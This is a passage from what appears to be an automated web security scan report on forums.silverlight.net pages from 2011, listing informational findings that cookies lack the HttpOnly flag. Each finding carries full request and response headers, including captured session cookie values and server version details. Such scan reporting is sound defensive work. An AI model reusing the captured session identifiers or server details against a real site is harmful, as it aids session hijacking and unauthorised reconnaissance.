Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:15 GMT
Content-Length: 66884


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link i
...[SNIP]...

17.162. http://forums.silverlight.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; expires=Sun, 29-Jan-2012 23:15:21 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:35:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:21 GMT
Content-Length: 62092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...

17.163. http://forums.silverlight.net/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 62169
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:48 GMT; expires=Sun, 29-Jan-2012 23:20:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...

17.164. http://forums.silverlight.net/forums/13.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/13.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72202
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Instal
...[SNIP]...

17.165. http://forums.silverlight.net/forums/14.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/14.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/14.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73488
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:21 GMT; expires=Sun, 29-Jan-2012 23:17:21 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:22 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Gettin
...[SNIP]...

17.166. http://forums.silverlight.net/forums/15.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/15.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/15.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76271
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:23 GMT; expires=Sun, 29-Jan-2012 23:17:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Hostin
...[SNIP]...

17.167. http://forums.silverlight.net/forums/16.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/16.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/16.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72987
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...

17.168. http://forums.silverlight.net/forums/17.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/17.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76509
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:32 GMT; expires=Sun, 29-Jan-2012 23:17:32 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:33 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...

17.169. http://forums.silverlight.net/forums/18.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/18.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/18.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73765
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:34 GMT; expires=Sun, 29-Jan-2012 23:17:34 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Visual
...[SNIP]...

17.170. http://forums.silverlight.net/forums/19.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/19.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/19.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73133
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:15 GMT; expires=Sun, 29-Jan-2012 23:18:15 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:15 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Design
...[SNIP]...

17.171. http://forums.silverlight.net/forums/20.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/20.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/20.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 71471
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:22 GMT; expires=Sun, 29-Jan-2012 23:18:22 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Video
...[SNIP]...

17.172. http://forums.silverlight.net/forums/21.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/21.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/21.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 64982
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:47 GMT; expires=Sun, 29-Jan-2012 23:18:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Expres
...[SNIP]...

17.173. http://forums.silverlight.net/forums/25.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/25.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/25.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 66083
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:48 GMT; expires=Sun, 29-Jan-2012 23:18:48 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Feedba
...[SNIP]...

17.174. http://forums.silverlight.net/forums/28.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/28.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/28.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76750
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:40 GMT; expires=Sun, 29-Jan-2012 23:17:40 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:40 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Report
...[SNIP]...

17.175. http://forums.silverlight.net/forums/35.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/35.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/35.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 76441
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
